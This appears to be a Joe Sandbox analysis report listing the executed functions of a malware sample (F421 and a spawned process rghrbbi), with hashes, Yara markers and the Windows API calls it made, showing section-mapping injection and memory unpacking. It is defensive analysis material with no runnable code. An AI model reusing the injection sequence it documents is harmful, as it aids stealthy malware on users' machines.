Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction ID: 18644dced9cd2caf62a4109051f94e3e0c196277adac1f1b80d81581f0248fb5
Opcode Fuzzy Hash: e0c996b45f475bcdee2b3acca27bfff8738185ab06689bd0def3de9b12292fcf
Instruction Fuzzy Hash: 95512AB4900245BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759941CB64

Function 00401627 Relevance: 10.7, APIs: 7, Instructions: 170
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction ID: 9010f4212e2f095ee6e1513bebcb31b7ed322fe9e8888bc62802b8a5d7df5652
Opcode Fuzzy Hash: 8ea2bb8e40d2b6bb7fcf7676f7409f4a6beb0c313e7b1c0bb420ab3e3f8254c1
Instruction Fuzzy Hash: 795128B4900249BBEF208F91CC48FAFBBB8EF85B00F140169F911BA2A5D7759941CB64

Function 00401641 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

Function 00403103 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

Function 00403257 Relevance: 3.1, APIs: 2, Instructions: 83
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 0040322B
NtTerminateProcess.NTDLL ref: 0040323C

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

Function 02CB003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CB024D

Strings

cess, xrefs: 02CB018D
kernel32.dll, xrefs: 02CB008F, 02CB0095

Memory Dump Source

Source File: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cb0000_F421.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: cf7339fcc9830ce15fc99d41795d567bf203f76d7c6899e1791ff3b9f3428347
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: E9527974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF14

Function 00415440 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041551F
GetProcAddress.KERNEL32(00000000,00419CC8), ref: 0041555C
VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 0041557B

Strings

, xrefs: 00415485

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

Function 02DAA793 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DAA7BB
Module32First.KERNEL32(00000000,00000224), ref: 02DAA7DB

Memory Dump Source

Source File: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2da7000_F421.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 97f71007b6daa183c91bf6dc0888521aa7040599355ed1e322b2ca69039cd176
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 10F096361007116FD7203BF99CACF6F76FCAF49624F100629E646915C0DB70EC45CA61

Function 02CB0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CB0223,?,?), ref: 02CB0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CB0223,?,?), ref: 02CB0E1E

Memory Dump Source

Source File: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2cb0000_F421.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: fdadc0463ad45a6f1627bb6a21ce9283ece9353430d24b8cd761bb0491863ca9
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A9D01236245228B7DB012A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA

Function 004019C0 Relevance: 1.3, APIs: 1, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

Function 004019E0 Relevance: 1.3, APIs: 1, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F

Function 004019EB Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B

Function 00401A04 Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F

Function 004019FD Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F

Function 02DAA452 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DAA4A3

Memory Dump Source

Source File: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2da7000_F421.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 4faa677c2626137f1b67ae4e893219315d375f339de73c97cc3e7e00c05bdc10
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 91112B79A00208EFDB01DF98CA95E99BBF5EF08351F0580A4F9489B361D371EA50EF90

Function 00401A15 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B

Function 00401A20 Relevance: 1.3, APIs: 1, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401A31

Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B

Function 00415410 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415A8D), ref: 00415418

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14

Non-executed Functions

Function 00401E65 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90

Function 00415610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 0041563D
WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 00415661
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415669
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1

Strings

-, xrefs: 004156DE

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 1791614364-2547889144
Opcode ID: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
Instruction ID: 327a1d9486ecdfb24dc002fa9ea073514ce32c0532a3afa617439fefb1992a41
Opcode Fuzzy Hash: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
Instruction Fuzzy Hash: 7E210830A84304EBD7509F54DC46FD97BB4EB48711F9280A5FA4DAA1C0CE7859C49BDD

Function 00415679 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1

Strings

-, xrefs: 004156DE

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShort
String ID: -
API String ID: 2381848886-2547889144
Opcode ID: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
Instruction ID: 7e98e6f74bb160639cfe8ebb3c1cacb5dac1db98f22b652a1399afec41121bf8
Opcode Fuzzy Hash: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
Instruction Fuzzy Hash: 2601F431A84344DADB708F509C82BD97BA4FB48325F924199FA8C6F1C0CEB519C4DBC9

Function 00415710 Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415744
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041575F
HeapDestroy.KERNEL32(00000000), ref: 0041577E
GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415788

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
Instruction ID: 75f5f447a75e1158ec7b8286dcbe49327f873da7596033eeb3f7384675a4dd99
Opcode Fuzzy Hash: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
Instruction Fuzzy Hash: C301A771A80108DFE750EBA4EC86BDA77A8A70C346F814036F605D72C0EF7459448B99

Analysis Process: rghrbbiPID: 3636, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	15.7%
Signature Coverage:	0%
Total number of Nodes:	178
Total number of Limit Nodes:	7

Executed Functions

Function 004157A0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 283
timefilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415892
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041589F
FindAtomW.KERNEL32(00000000), ref: 004158A6
GetConsoleMode.KERNEL32(00000000,00000000), ref: 004158AE
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004158C6
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004158ED
MoveFileW.KERNEL32(00000000,00000000), ref: 004158F5
GetVersionExW.KERNEL32(?), ref: 00415902
DisconnectNamedPipe.KERNEL32(?), ref: 00415915
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041595A
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415969
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415972
PulseEvent.KERNEL32(00000000), ref: 00415982
SetCommState.KERNELBASE(00000000,00000000), ref: 004159A9
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004159DA
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004159EB
GetComputerNameW.KERNEL32(?,?), ref: 004159FF
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415A3F
GetFileAttributesA.KERNEL32(00000000), ref: 00415A46
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415A4C
GetBinaryType.KERNEL32(004173D8,?), ref: 00415A5E
LoadLibraryA.KERNELBASE(004173E8), ref: 00415AD2
InterlockedDecrement.KERNEL32(?), ref: 00415B24
GetFileAttributesA.KERNEL32(004173F4), ref: 00415B57

Strings

}$, xrefs: 00415B2B
k`, xrefs: 00415B07

Memory Dump Source

Source File: 00000008.00000002.2703620678.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_40b000_rghrbbi.jbxd

Similarity

API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
String ID: k`$}$
API String ID: 723190256-956986773
Opcode ID: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
Instruction ID: 3bf9ffe576a9fbcecb19cba34f73af1320b210f32c47b7a0ffd63e7749ed94fc
Opcode Fuzzy Hash: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
Instruction Fuzzy Hash: 17A1D071941624DFC724DB61DC48EDB7B79EF8D350F0180AAF609A7250DB385A81CFA9

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2703581210.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_rghrbbi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
